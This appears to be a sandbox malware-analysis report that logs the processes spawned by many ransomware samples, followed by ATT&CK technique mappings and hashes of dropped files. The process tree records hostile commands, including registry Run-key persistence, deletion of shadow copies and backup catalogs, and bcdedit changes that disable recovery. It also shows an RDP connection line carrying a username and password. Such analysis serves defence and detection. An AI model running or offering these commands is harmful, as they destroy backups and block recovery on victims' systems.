- - C:\Users\Admin\Desktop\00423\HEUR-Trojan-Ransom.MSIL.Blocker.gen-bdc7fa90a1a4ae03e63fe914c7222cd7019d1b3cd0676fa5ee3f6f7c04416d7b.exe
    HEUR-Trojan-Ransom.MSIL.Blocker.gen-bdc7fa90a1a4ae03e63fe914c7222cd7019d1b3cd0676fa5ee3f6f7c04416d7b.exe
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    PID:848
  - - C:\Windows\SysWOW64\cmd.exe
      "cmd.exe" /c REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "W" /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\W.exe"
      4⤵
      PID:3344
    - - C:\Windows\SysWOW64\reg.exe
        
        REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "W" /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\W.exe"
        5⤵
        
        PID:6012
  - - C:\Users\Admin\AppData\Roaming\W.exe
      "C:\Users\Admin\AppData\Roaming\W.exe"
      4⤵
      PID:6420
- - C:\Users\Admin\Desktop\00423\HEUR-Trojan-Ransom.MSIL.Foreign.gen-e4d1f8ff1282ac60adc0134aec2420aa652250ac8ddafe866e56d2fab165a132.exe
    HEUR-Trojan-Ransom.MSIL.Foreign.gen-e4d1f8ff1282ac60adc0134aec2420aa652250ac8ddafe866e56d2fab165a132.exe
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:2956
- - C:\Users\Admin\Desktop\00423\HEUR-Trojan-Ransom.MSIL.Makop.gen-13c9d681432c3a57f8de0d295a1bf36c5a72587339bbb629e9467697d75c5634.exe
    HEUR-Trojan-Ransom.MSIL.Makop.gen-13c9d681432c3a57f8de0d295a1bf36c5a72587339bbb629e9467697d75c5634.exe
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:4340
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c timeout 1
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:4716
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout 1
        5⤵
        System Location Discovery: System Language Discovery
        Delays execution with timeout.exe
        
        PID:2816
  - - C:\Users\Admin\Desktop\00423\HEUR-Trojan-Ransom.MSIL.Makop.gen-13c9d681432c3a57f8de0d295a1bf36c5a72587339bbb629e9467697d75c5634.exe
      "C:\Users\Admin\Desktop\00423\HEUR-Trojan-Ransom.MSIL.Makop.gen-13c9d681432c3a57f8de0d295a1bf36c5a72587339bbb629e9467697d75c5634.exe"
      4⤵
      PID:4588
    - - C:\Users\Admin\Desktop\00423\HEUR-Trojan-Ransom.MSIL.Makop.gen-13c9d681432c3a57f8de0d295a1bf36c5a72587339bbb629e9467697d75c5634.exe
        
        "C:\Users\Admin\Desktop\00423\HEUR-Trojan-Ransom.MSIL.Makop.gen-13c9d681432c3a57f8de0d295a1bf36c5a72587339bbb629e9467697d75c5634.exe" n4588
        5⤵
        
        PID:2620
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c timeout 1
        6⤵
        
        PID:1232
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout 1
        7⤵
        Delays execution with timeout.exe
        
        PID:4180
      - C:\Users\Admin\Desktop\00423\HEUR-Trojan-Ransom.MSIL.Makop.gen-13c9d681432c3a57f8de0d295a1bf36c5a72587339bbb629e9467697d75c5634.exe
        
        "C:\Users\Admin\Desktop\00423\HEUR-Trojan-Ransom.MSIL.Makop.gen-13c9d681432c3a57f8de0d295a1bf36c5a72587339bbb629e9467697d75c5634.exe"
        6⤵
        
        PID:4340
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2620 -s 1412
        6⤵
        Program crash
        
        PID:4024
    - - C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe"
        5⤵
        
        PID:1520
      - C:\Windows\system32\vssadmin.exe
        
        vssadmin delete shadows /all /quiet
        6⤵
        Interacts with shadow copies
        
        PID:3032
      - C:\Windows\system32\wbadmin.exe
        
        wbadmin delete catalog -quiet
        6⤵
        Deletes backup catalog
        
        PID:3440
      - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic shadowcopy delete
        6⤵
        
        PID:6724
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4340 -s 1460
      4⤵
      Program crash
      PID:892
- - C:\Users\Admin\Desktop\00423\HEUR-Trojan-Ransom.Win32.Agent.gen-4c8a08604c4ec8c78fdeff7cbb82eba5a901be1d2960dfce6ccac69aeb88b340.exe
    HEUR-Trojan-Ransom.Win32.Agent.gen-4c8a08604c4ec8c78fdeff7cbb82eba5a901be1d2960dfce6ccac69aeb88b340.exe
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    PID:3440
  - - C:\Users\Admin\AppData\Local\.exe
      "C:\Users\Admin\AppData\Local\\.exe" /firstrun
      4⤵
      PID:4284
- - C:\Users\Admin\Desktop\00423\HEUR-Trojan-Ransom.Win32.Crusis.gen-553044d9334dccc353bf758c57b492d6074a8104518590375c259c38dcb741db.exe
    HEUR-Trojan-Ransom.Win32.Crusis.gen-553044d9334dccc353bf758c57b492d6074a8104518590375c259c38dcb741db.exe
    3⤵
    PID:1096
- - C:\Users\Admin\Desktop\00423\HEUR-Trojan-Ransom.Win32.Cryptor.gen-f0e6ff17ad8dbc2b52fb3b11d86512f605f332b946c0804a712561af8f78327a.exe
    HEUR-Trojan-Ransom.Win32.Cryptor.gen-f0e6ff17ad8dbc2b52fb3b11d86512f605f332b946c0804a712561af8f78327a.exe
    3⤵
    PID:3472
- - C:\Users\Admin\Desktop\00423\HEUR-Trojan-Ransom.Win32.Encoder.gen-a2fe2942436546be34c1f83639f1624cae786ab2a57a29a75f27520792cbf3da.exe
    HEUR-Trojan-Ransom.Win32.Encoder.gen-a2fe2942436546be34c1f83639f1624cae786ab2a57a29a75f27520792cbf3da.exe
    3⤵
    PID:1108
- - C:\Users\Admin\Desktop\00423\HEUR-Trojan-Ransom.Win32.Gen.vho-5eaa16d48ef3e37fa1b4dfb19fe3b46a35fc8789e39e4c1e590b9af97cc00662.exe
    HEUR-Trojan-Ransom.Win32.Gen.vho-5eaa16d48ef3e37fa1b4dfb19fe3b46a35fc8789e39e4c1e590b9af97cc00662.exe
    3⤵
    PID:4208
- - C:\Users\Admin\Desktop\00423\HEUR-Trojan-Ransom.Win32.Generic-ea5b9af55f33912956438ccf8cea5222deb2b471368d68bd3c7e74b695ade0a8.exe
    HEUR-Trojan-Ransom.Win32.Generic-ea5b9af55f33912956438ccf8cea5222deb2b471368d68bd3c7e74b695ade0a8.exe
    3⤵
    PID:4336
  - - C:\Users\Admin\AppData\Local\Temp\PowerISO.exe
      "C:\Users\Admin\AppData\Local\Temp\PowerISO.exe"
      4⤵
      PID:5280
    - - C:\Windows\System32\regsvr32.exe
        
        "C:\Windows\System32\regsvr32.exe" /s "C:\Users\Admin\AppData\Local\Temp\PWRISOSH.DLL"
        5⤵
        
        PID:5168
  - - C:\Users\Admin\Downloads\PowerISO.exe
      "C:\Users\Admin\Downloads\PowerISO.exe"
      4⤵
      PID:5772
    - - C:\Users\Admin\AppData\Local\a59e358a\tor\TORBUILD.exe
        
        "C:\Users\Admin\AppData\Local\a59e358a\tor\TORBUILD.exe" -f torrc
        5⤵
        
        PID:7312
- - C:\Users\Admin\Desktop\00423\HEUR-Trojan-Ransom.Win32.Lockbit.vho-95739e350d7f2aca2c609768ee72ad67fcf05efca5c7ad8df3027c82b9c454cf.exe
    HEUR-Trojan-Ransom.Win32.Lockbit.vho-95739e350d7f2aca2c609768ee72ad67fcf05efca5c7ad8df3027c82b9c454cf.exe
    3⤵
    PID:1416
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
      4⤵
      PID:5156
    - - C:\Windows\system32\vssadmin.exe
        
        vssadmin delete shadows /all /quiet
        5⤵
        Interacts with shadow copies
        
        PID:6980
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic shadowcopy delete
        5⤵
        
        PID:4956
    - - C:\Windows\system32\bcdedit.exe
        
        bcdedit /set {default} bootstatuspolicy ignoreallfailures
        5⤵
        Modifies boot configuration data using bcdedit
        
        PID:6404
    - - C:\Windows\system32\bcdedit.exe
        
        bcdedit /set {default} recoveryenabled no
        5⤵
        Modifies boot configuration data using bcdedit
        
        PID:6640
    - - C:\Windows\system32\wbadmin.exe
        
        wbadmin delete catalog -quiet
        5⤵
        Deletes backup catalog
        
        PID:10088
- - C:\Users\Admin\Desktop\00423\HEUR-Trojan-Ransom.Win32.Shade.gen-661c207b9f104de23a76a4e5e34d225a4370841a6614cfb2564f93e488adeae2.exe
    HEUR-Trojan-Ransom.Win32.Shade.gen-661c207b9f104de23a76a4e5e34d225a4370841a6614cfb2564f93e488adeae2.exe
    3⤵
    PID:992
- - C:\Users\Admin\Desktop\00423\Trojan-Ransom.MSIL.Blocker.cb-c136eadb287bd19a8fe6ca88563c687042dede267fd747ef12333f04d82175c9.exe
    Trojan-Ransom.MSIL.Blocker.cb-c136eadb287bd19a8fe6ca88563c687042dede267fd747ef12333f04d82175c9.exe
    3⤵
    PID:1928
- - C:\Users\Admin\Desktop\00423\Trojan-Ransom.Win32.AutoIt.zlw-7c28986fb7b3a2ef46068bf358c2818302ea3fbfe42c59734958b544a8206acf.exe
    Trojan-Ransom.Win32.AutoIt.zlw-7c28986fb7b3a2ef46068bf358c2818302ea3fbfe42c59734958b544a8206acf.exe
    3⤵
    PID:3068
  - - C:\Users\Admin\RDP6\ConnectionClient.exe
      "C:\Users\Admin\RDP6\ConnectionClient.exe" -server fmea.homepc.it -user carlo -psw newfmea -color 32 -alttab 0 -remoteapp off -seamless off -width 1024 -height 768 -printer off -com off -smartcard off -preview on -disk on -smartsizing 0 -localtb 32
      4⤵
      PID:9452
- - C:\Users\Admin\Desktop\00423\Trojan-Ransom.Win32.Blocker.ielm-b5a85d1c62dd6b225909bd5de46603d06b24c28ed6db0394276443c013da885c.exe
    Trojan-Ransom.Win32.Blocker.ielm-b5a85d1c62dd6b225909bd5de46603d06b24c28ed6db0394276443c013da885c.exe
    3⤵
    PID:5456
  - - C:\Users\Admin\AppData\Local\Temp\reader.exe
      "C:\Users\Admin\AppData\Local\Temp\reader.exe"
      4⤵
      PID:6476
    - - C:\Users\Admin\AppData\Local\Google (x86)\Chrome32.exe
        
        "C:\Users\Admin\AppData\Local\Google (x86)\Chrome32.exe" C:\Users\Admin\AppData\Local\Temp\reader.exe
        5⤵
        
        PID:6656
- - C:\Users\Admin\Desktop\00423\Trojan-Ransom.Win32.Blocker.jtvd-d26dae0d8e5c23ec35e8b9cf126cded45b8096fc07560ad1c06585357921eeed.exe
    Trojan-Ransom.Win32.Blocker.jtvd-d26dae0d8e5c23ec35e8b9cf126cded45b8096fc07560ad1c06585357921eeed.exe
    3⤵
    PID:6000
- - C:\Users\Admin\Desktop\00423\Trojan-Ransom.Win32.Blocker.jzec-6297bd0997c41e86344533c451d5b57fece20753e2629be9145df90bde149800.exe
    Trojan-Ransom.Win32.Blocker.jzec-6297bd0997c41e86344533c451d5b57fece20753e2629be9145df90bde149800.exe
    3⤵
    PID:6068
- - C:\Users\Admin\Desktop\00423\Trojan-Ransom.Win32.Blocker.kiaf-8f939e65e9ffedd16ae86687e154adbe607d56950d082778300039283f2f8330.exe
    Trojan-Ransom.Win32.Blocker.kiaf-8f939e65e9ffedd16ae86687e154adbe607d56950d082778300039283f2f8330.exe
    3⤵
    PID:7456
  - - C:\Users\Admin\AppData\Roaming\dwhost.exe
      "C:\Users\Admin\AppData\Roaming\dwhost.exe"
      4⤵
      PID:5080
  - - C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
      "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Roaming\0927.doc" /o ""
      4⤵
      PID:6876
    - - C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe
        
        OfficeC2RClient.exe /error PID=6876 ProcessName="Microsoft Word" UIType=3 ErrorSource=0x8b10082a ErrorCode=0x80004005 ShowUI=1
        5⤵
        Process spawned unexpected child process
        
        PID:6960
- - C:\Users\Admin\Desktop\00423\Trojan-Ransom.Win32.Blocker.kjax-ea8a1e3d0d233103bd3a6f533f39b23329155496ffd5f690a0107e6a065312ef.exe
    Trojan-Ransom.Win32.Blocker.kjax-ea8a1e3d0d233103bd3a6f533f39b23329155496ffd5f690a0107e6a065312ef.exe
    3⤵
    PID:8172
  - - C:\Users\Admin\Desktop\00423\Trojan-Ransom.Win32.Blocker.kjax-ea8a1e3d0d233103bd3a6f533f39b23329155496ffd5f690a0107e6a065312ef.exe
      Trojan-Ransom.Win32.Blocker.kjax-ea8a1e3d0d233103bd3a6f533f39b23329155496ffd5f690a0107e6a065312ef.exe
      4⤵
      PID:7088
- - C:\Users\Admin\Desktop\00423\Trojan-Ransom.Win32.Blocker.lckf-60b0db3c80380c8f15fba440b04ef675243b31656b6356560a0740c5b9f9c605.exe
    Trojan-Ransom.Win32.Blocker.lckf-60b0db3c80380c8f15fba440b04ef675243b31656b6356560a0740c5b9f9c605.exe
    3⤵
    PID:2896
- - C:\Users\Admin\Desktop\00423\Trojan-Ransom.Win32.Blocker.lzlk-8ce5f55eed5141ae2f20761fd2abecf129a7531e86806712de11ba1f78a9a4dc.exe
    Trojan-Ransom.Win32.Blocker.lzlk-8ce5f55eed5141ae2f20761fd2abecf129a7531e86806712de11ba1f78a9a4dc.exe
    3⤵
    PID:6424
- - C:\Users\Admin\Desktop\00423\Trojan-Ransom.Win32.Blocker.mvov-a720114ccd70711f55fcde6de0010eb2bb99f99a04292c7188c5a25c1a2bf65c.exe
    Trojan-Ransom.Win32.Blocker.mvov-a720114ccd70711f55fcde6de0010eb2bb99f99a04292c7188c5a25c1a2bf65c.exe
    3⤵
    PID:6564
  - - C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\D25E.tmp\D647.tmp\D648.bat C:\Users\Admin\Desktop\00423\Trojan-Ransom.Win32.Blocker.mvov-a720114ccd70711f55fcde6de0010eb2bb99f99a04292c7188c5a25c1a2bf65c.exe"
      4⤵
      PID:9640
- - C:\Users\Admin\Desktop\00423\Trojan-Ransom.Win32.Blocker.mvql-76acd3058c0b09c8bd34be9fe13999cf7d34009154888e276d93a0702ed234f5.exe
    Trojan-Ransom.Win32.Blocker.mvql-76acd3058c0b09c8bd34be9fe13999cf7d34009154888e276d93a0702ed234f5.exe
    3⤵
    PID:7564
- - C:\Users\Admin\Desktop\00423\Trojan-Ransom.Win32.Crusis.to-40a837f93edb2531fe35733d725efb490c7b5199d031a6e087b5041aed6eea05.exe
    Trojan-Ransom.Win32.Crusis.to-40a837f93edb2531fe35733d725efb490c7b5199d031a6e087b5041aed6eea05.exe
    3⤵
    PID:8084
  - - C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe"
      4⤵
      PID:5148
    - - C:\Windows\system32\mode.com
        
        mode con cp select=1251
        5⤵
        
        PID:5660
- - C:\Users\Admin\Desktop\00423\Trojan-Ransom.Win32.Cryptor.ech-f58a28f7813f83dd0074d25fefb4cc8693b7c7004366e1a0494f98e4201498d0.exe
    Trojan-Ransom.Win32.Cryptor.ech-f58a28f7813f83dd0074d25fefb4cc8693b7c7004366e1a0494f98e4201498d0.exe
    3⤵
    PID:7756
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 7756 -s 408
      4⤵
      Program crash
      PID:8392
- - C:\Users\Admin\Desktop\00423\Trojan-Ransom.Win32.DoppelPaymer.ba-17528798f8b5ec83731a383b16b692bb3a5aa6d9c09fe0e9bb6fb92687350963.exe
    Trojan-Ransom.Win32.DoppelPaymer.ba-17528798f8b5ec83731a383b16b692bb3a5aa6d9c09fe0e9bb6fb92687350963.exe
    3⤵
    PID:5680
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5680 -s 444
      4⤵
      Program crash
      PID:8404
- - C:\Users\Admin\Desktop\00423\Trojan-Ransom.Win32.Gen.zsh-b74d0a068b387f7569f9a42729853e742a99ccd71c45946ae153a39eba6b153e.exe
    Trojan-Ransom.Win32.Gen.zsh-b74d0a068b387f7569f9a42729853e742a99ccd71c45946ae153a39eba6b153e.exe
    3⤵
    PID:6168
- - C:\Users\Admin\Desktop\00423\Trojan-Ransom.Win32.Gimemo.cdqu-62bc38b92cf51417b5b81faea2826e14dbc4c35f261f0dc188eb2011c197edfa.exe
    Trojan-Ransom.Win32.Gimemo.cdqu-62bc38b92cf51417b5b81faea2826e14dbc4c35f261f0dc188eb2011c197edfa.exe
    3⤵
    PID:5256
- - C:\Users\Admin\Desktop\00423\Trojan-Ransom.Win32.Mbro.bcej-aea7df55e5b6c953134e54023245349bbb59a7d8952c0ee49f7f19d5cc941f55.exe
    Trojan-Ransom.Win32.Mbro.bcej-aea7df55e5b6c953134e54023245349bbb59a7d8952c0ee49f7f19d5cc941f55.exe
    3⤵
    PID:5972
- - C:\Users\Admin\Desktop\00423\Trojan-Ransom.Win32.PornoAsset.cwhq-4bc8280a99d07165055fabed11049d8da275f27f5d8cffc4ed10a68be2d0cb84.exe
    Trojan-Ransom.Win32.PornoAsset.cwhq-4bc8280a99d07165055fabed11049d8da275f27f5d8cffc4ed10a68be2d0cb84.exe
    3⤵
    PID:7096
- - C:\Users\Admin\Desktop\00423\Trojan-Ransom.Win32.Snocry.cv-8bd18f4dd96a2dce388de5b8ba7c6fefdd59d5a132fc5fd5f93f726860852b1b.exe
    Trojan-Ransom.Win32.Snocry.cv-8bd18f4dd96a2dce388de5b8ba7c6fefdd59d5a132fc5fd5f93f726860852b1b.exe
    3⤵
    PID:7956
- - C:\Users\Admin\Desktop\00423\Trojan-Ransom.Win32.Sodin.adu-5dde3386e0ce769bfd1880175168a71931d1ffb881b5050760c19f46a318efc9.exe
    Trojan-Ransom.Win32.Sodin.adu-5dde3386e0ce769bfd1880175168a71931d1ffb881b5050760c19f46a318efc9.exe
    3⤵
    PID:6276

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 4340 -ip 4340
1⤵
PID:1488

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
PID:3332

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 2620 -ip 2620
1⤵
PID:540

C:\Windows\system32\wbengine.exe
"C:\Windows\system32\wbengine.exe"
1⤵
PID:5212

C:\Windows\System32\vdsldr.exe
C:\Windows\System32\vdsldr.exe -Embedding
1⤵
PID:5820

C:\Windows\System32\vds.exe
C:\Windows\System32\vds.exe
1⤵
PID:5272

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
PID:1500

C:\Windows\explorer.exe
explorer.exe
1⤵
PID:6244

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 7756 -ip 7756
1⤵
PID:6108

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 5680 -ip 5680
1⤵
PID:4732

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

Windows Management Instrumentation

T1047

Persistence

Privilege Escalation

Defense Evasion

Direct Volume Access

T1006

Indicator Removal

T1070

File Deletion

T1070.004

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\MILIHPEN-INSTRUCT.txt

Filesize
3KB

MD5
611967dc096d8c0ab7fe1c2687f8408b

SHA1
df899f0de118d472adc14f8463f8a9afa1059f9e

SHA256
1309de4b97003d73d30ee21f63f53f1044572a75e204c6b7efd7a30e3cbf2a67

SHA512
d52cbedcbae340eedccb3e201464744803ba95623b201e809249428fe7d8db7d38647dae0d35d484a9a8b8064e859559bc5be52ce31d0cf9a03ba63c1e59105d

Download Submit
C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RCom.dll.id-72872BEE.[[email protected]].ROGER

Filesize
3.3MB

MD5
3c89a9c0fdca4e94d08494f6052d36a1

SHA1
3770369df89b4d85b2c111ec922821f1816056c6

SHA256
037f9d1afb5ce4d6e5987f049e6c0e9ed84ff7ec2ae7fc1432246163ec57a4fa

SHA512
9e087a6b3a93b3bd63b2874920ff5ff6cd80189486514c48b11bcb13989d75c8f12ffac36728c8f4d7e1a799aa9ff47161a5ec42f18976ea27f7cc0855787609

Download Submit
C:\Program Files\dotnet\Restore-My-Files.txt

Filesize
1KB

MD5
f18c1dcc3337a21fc7f8e798384e08f8

SHA1
4b5c5a8cc94d6c1cacd2aebd0c28824f3f0ebfb1

SHA256
01798338f1f514526076b202c2bbc21b5ef986d2c29d5e15e429f37edec271f7

SHA512
db418d87ff73704ffd9beac28405591df46fedd1d387f6de37e4961bf7cf61c8c09f56b261e74391c7394e054709825e3f1363c18db828e01dcc8bb15b5540ce

Download Submit
C:\ProgramData\taTniEDaWWfP\1723651.txt

Filesize
148B

MD5
c672c5ffd1a94b729484cc279d2a8a93

SHA1
3e3ce8ad41d3ffe36d461a21ded8fead5d11e88b

SHA256
087e2c68049f6d81393d62c9fbca232111ec9e0411f5cc9ab1e718475581eaea

SHA512
969821c1ea8ae7b400e0e603326a3eb76ad22c21572a12b34e50f97f174f53456e937872c1a5980f7401d702c56c00ec0c5fa4d9cdc38b7d2c6200037f12aae3

Download Submit
C:\ProgramData\taTniEDaWWfP\Files\Information.txt

Filesize
2KB

MD5
d1bee712ec47b4b028fa98369541e927

SHA1
dfb77a70aa6c2ecda61b68a0bee23bfb2c051e4d

SHA256
ccb659bd5a03e7308b4bfbfdb66e651e221bf0af0fb8960f415063453d446093

SHA512
3255dc3f027154052c5f9ba89d2977503f95d027f15e5753927a50da98b5cb76b6dde949ef4cb2b17c68852aaf78e129714a7a1e2b23b0866a09e5d9ee214e9c

Download Submit
C:\ProgramData\taTniEDaWWfP\Files\Information.txt

Filesize
3KB

MD5
b5041d55e52bd9c3c86008bdaa62a0a7

SHA1
63fd7e39c5b5968f9c6dadeabc5058d54562a5e8

SHA256
ee7e3def25a8fb4465c1397d5c29f60a277a446ca576b03071f801a626818140

SHA512
66d99d32c3b5a80ce9702a36e1d9d36519c265e11279555a55a96b6d23ffe9f1092145d95f7c5c55ebe3f249af524ec2669569289ff7f5e53afe07f2b199409c

Download Submit
C:\ProgramData\taTniEDaWWfP\Files\Passwords_List.txt

Filesize
3B

MD5
ecaa88f7fa0bf610a5a26cf545dcd3aa

SHA1
57218c316b6921e2cd61027a2387edc31a2d9471

SHA256
f1945cd6c19e56b3c1c78943ef5ec18116907a4ca1efc40a57d48ab1db7adfc5

SHA512
37c783b80b1d458b89e712c2dfe2777050eff0aefc9f6d8beedee77807d9aeb2e27d14815cf4f0229b1d36c186bb5f2b5ef55e632b108cc41e9fb964c39b42a5

Download Submit
C:\Recovery\WindowsRE\MILIHPEN-INSTRUCT.txt

Filesize
1KB

MD5
ee42367c45eb71d049fc7a92cae5a413

SHA1
3063b523256094710b8c9bf050b2dadbd079eef8

SHA256
02be0608a9c57572d77808769b262696d1741d680b330dbb9ef6e7a145b88bc7

SHA512
81bf463cf1335a89c590b1e24689f5eb5f28a001c5b43693db74b1b87dbb7c1255022f1bb4ef7ae6211af9d7f59aaaba8836d01b3c9a2b9f2aee2a39c27975ba

Download Submit
C:\Users\Admin\AppData\Local\.exe

Filesize
1.9MB

MD5
1c9e9e288e1402315a63cda43c8e9336

SHA1
8c01843809ee9a5a3c4ef70f426d4d393d27b8f7

SHA256
2fccde96cfb11196bdbe90d8f23b13c2cc0b26f5f22fa8ed4293410bf89f41c7

SHA512
272c654fa76d34061340990c2154afea1b1933439292ea3122d9e86f8717ec2c8629c25d6c31f02a98577dd0e597ebe4ee4e05ce311e5b5cc0490c4ecb1cf663

Download Submit
C:\Users\Admin\AppData\Local\D3DSCache\e8010882af4f153f\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.idx

Filesize
64KB

MD5
d2fb266b97caff2086bf0fa74eddb6b2

SHA1
2f0061ce9c51b5b4fbab76b37fc6a540be7f805d

SHA256
b09f68b61d9ff5a7c7c8b10eee9447d4813ee0e866346e629e788cd4adecb66a

SHA512
c3ba95a538c1d266beb83334af755c34ce642a4178ab0f2e5f7822fd6821d3b68862a8b58f167a9294e6d913b08c1054a69b5d7aec2efdb3cf9796ed84de21a8

Download Submit
C:\Users\Admin\AppData\Local\D3DSCache\e8010882af4f153f\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.lock

Filesize
4B

MD5
f49655f856acb8884cc0ace29216f511

SHA1
cb0f1f87ec0455ec349aaa950c600475ac7b7b6b

SHA256
7852fce59c67ddf1d6b8b997eaa1adfac004a9f3a91c37295de9223674011fba

SHA512
599e93d25b174524495ed29653052b3590133096404873318f05fd68f4c9a5c9a3b30574551141fbb73d7329d6be342699a17f3ae84554bab784776dfda2d5f8

Download Submit
C:\Users\Admin\AppData\Local\D3DSCache\e8010882af4f153f\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.val

Filesize
944B

MD5
6bd369f7c74a28194c991ed1404da30f

SHA1
0f8e3f8ab822c9374409fe399b6bfe5d68cbd643

SHA256
878947d0ec814fe7c343cdebc05eebf00eb14f3023bdb3809a559e17f399fe5d

SHA512
8fc5f073dc9fa1e1ae47c60a5f06e0a48709fd6a4302dffaa721858409e7bde64bc6856d3fb28891090516d1a7afc542579de287778b5755eafe75cc67d45d93

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
53KB

MD5
a26df49623eff12a70a93f649776dab7

SHA1
efb53bd0df3ac34bd119adf8788127ad57e53803

SHA256
4ebde1c12625cb55034d47e5169f709b0bd02a8caa76b5b9854efad7f4710245

SHA512
e5f9b8645fb2a50763fcbffe877ca03e9cadf099fe2d510b74bfa9ff18d0a6563d11160e00f495eeefebde63450d0ade8d6b6a824e68bd8a59e1971dc842709c

Download Submit
C:\Users\Admin\AppData\Local\Temp\$PowerISO$\7B46.tmp.ico

Filesize
2KB

MD5
4198afdeb9ace242c575ee572af22e1f

SHA1
32784594ec69ca459878010401c3931be8e5e15e

SHA256
b4d6704aabfcc8b7cb8f4ee58b162dd124e2d0e4dce20ecf13eebd262dd1e76e

SHA512
d4288466d9a669c7735dc788f81fd5581876048644c48a58df5e2f8c70d468464d9de2bcbd295cdfe8510fd77a9a3cc26e3de0a1cf985622fec00baefda7f4cc

Download Submit
C:\Users\Admin\AppData\Local\Temp\PowerISO.exe

Filesize
5.2MB

MD5
b51cde6cfd261226786bca2eb384e4a3

SHA1
61863de730ef6b6839f556120e3f05efee4b1619

SHA256
6bd7624f6fe3cfe0247c18ee82baa56f682f0db24aad6194351135e319ab1021

SHA512
e3b9e24a8a4e89420f9bf5ddd6274310f2318ab2ab63fd51ba1629cc69a4a3fbcebc1ebe0fceded484297293f5350e07ae90ccf45934f6847c7cd51b05e500ea

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_edotfc1s.415.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\aut6A6F.tmp

Filesize
822B

MD5
382b5ca035e5c49fa3f8c4d7b192eb47

SHA1
3834987670ed852bb3aa196971257c1cc2937383

SHA256
81be44072a9c98f86a642fa6fb01e8279c2a73b2aaa04e5f217cb89ac66de60c

SHA512
fb7eb59527c06d633a665c8c8bb1e4c99362b4d6e18728c95df0cab2f95acf5be5cbc94721964cfb2839e5560125ac276220d091c762f5d196724063ca3b630a

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsl465D.tmp\System.dll

Filesize
11KB

MD5
a4dd044bcd94e9b3370ccf095b31f896

SHA1
17c78201323ab2095bc53184aa8267c9187d5173

SHA256
2e226715419a5882e2e14278940ee8ef0aa648a3ef7af5b3dc252674111962bc

SHA512
87335a43b9ca13e1300c7c23e702e87c669e2bcf4f6065f0c684fc53165e9c1f091cc4d79a3eca3910f0518d3b647120ac0be1a68eaade2e75eaa64adfc92c5a

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsl465D.tmp\npHelper.dll

Filesize
292KB

MD5
22ba9948be38685d74e72b03784b3ada

SHA1
c37ff1d53d7267833107f0a2d12b771010ed8caa

SHA256
17c9dc6dab6982fc735706c9c281ef5af144211149f047cde959023b5ef29306

SHA512
